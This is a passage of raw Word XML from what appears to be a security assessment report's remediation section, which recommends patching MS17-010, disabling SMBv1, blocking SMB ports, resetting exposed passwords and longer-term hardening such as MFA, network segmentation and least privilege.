    <w:p w14:paraId="42E8E7BA" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Install the MS17-010 security patch immediately:</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5DFE4C" w14:textId="32DF7DC6"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This is the most primary and crucial action. The security update officially released by Microsoft must be installed immediately for all affected Windows systems (including but not limited to Windows 7, Windows Server 2008/2012/2016, etc.). WSUS or other patch management tools should be used to ensure 100% coverage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8383AA" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062AE42E" w14:textId="45A054BC" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>Disable</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the SMBv1 protocol across the entire network:</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF16840" w14:textId="48447AE1"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SMBv1 is an outdated and vulnerable protocol. "Eternal Blue" is just one of its many problems. SMBv1 should be forcibly disabled on all Windows clients and servers throughout the network through Group Policy (GPO). Modern operating systems no longer need it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571F94D4" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="009F3ECC" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56F57A39" w14:textId="77777777" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Block the SMB port on the network boundary firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B393365" w14:textId="071BF793"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lastRenderedPageBreak/>
        <w:t>Strictly prohibit any traffic from the Internet from accessing the TCP ports 445 and 139 of the internal network. These ports should never be open to the public network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D90EDD" w14:textId="77777777" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="00FD52FC" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7582DB" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Reset all relevant passwords immediately:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329EB3F" w14:textId="05F98639" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediately reset the Administrator account password of the server and set it to a strong and complex password of at least 16 characters, containing both </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>upper- and lower-case</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> letters, numbers, and special symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3281A3" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Immediately modify the FTP service password found in passwords.txt and review whether all the data on the FTP server has been tampered with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA43B6E" w14:textId="7BA6BAF1" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete the password-.txt file and conduct a thorough investigation of the entire system to ensure that there </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> no other similar plaintext passwords stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E1FF26" w14:textId="77777777" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="00FD52FC" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D88ED68" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>.2 Long-term Strategic Security Reinforcement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908B821" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Establish and implement a strict patch management process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8C7B84" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Formulate a formal patch management strategy and stipulate the evaluation, testing and deployment schedule for newly released patches. For "critical" level vulnerabilities, deployment should be completed within 48 hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B5343" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Deploy automated tools to distribute, monitor and verify the patch installation status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137951A5" w14:textId="77777777" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="00FD52FC" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56662926" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Implement strong password policies and credential management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284581A7" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Enforce high-strength password policies (minimum length, complexity requirements, historical password records, and regular changes) through group policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BBE42" w14:textId="3259BACA" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Use dedicated, unique and extremely long (more than 25 characters) random passwords for all service </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>accounts and</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> consider using an enterprise-level Password Vault for management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F34C58" w14:textId="77777777" w:rsidR="00FD52FC" w:rsidRPr="0022306B" w:rsidRDefault="00FD52FC" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="450EB49B" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Strengthen the network security architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48160E97" w14:textId="5D2E9A52" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">According to the importance of </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the business</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> level, the network is divided into different security areas (for example, server area, office area, DMZ area) using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vlans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> or firewalls. This can effectively restrict the lateral movement of attackers within the internal network after invading a device. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603374D9" w14:textId="32DC4A2A" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Enforce NLA for all remote Desktop (RDP) connections, which requires users to authenticate before establishing a session, effectively defending against various attacks targeting RDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116A12B" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Implement the principle of least privilege and strong access control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A2348" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The principle of least privilege: Ensure that all user accounts and service accounts only have the minimum permissions necessary for them to perform their duties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0219AC57" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly review the list of administrator accounts and </w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">remove unnecessary permissions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31BD85" w14:textId="761E43BD" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce MFA for all remote accesses (such as VPN, OWA) and logins of all administrator </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>accounts. This is currently one of the most effective methods to defend against credential theft attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B407B6C" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Establish continuous security monitoring and log auditing capabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E3A005" w14:textId="45561D73" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable detailed security audit logs </w:t>
      </w:r>
      <w:r w:rsidR="009F3ECC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>onto</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> all k</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ey servers and network devices. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CBAB7C" w14:textId="685A2252" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
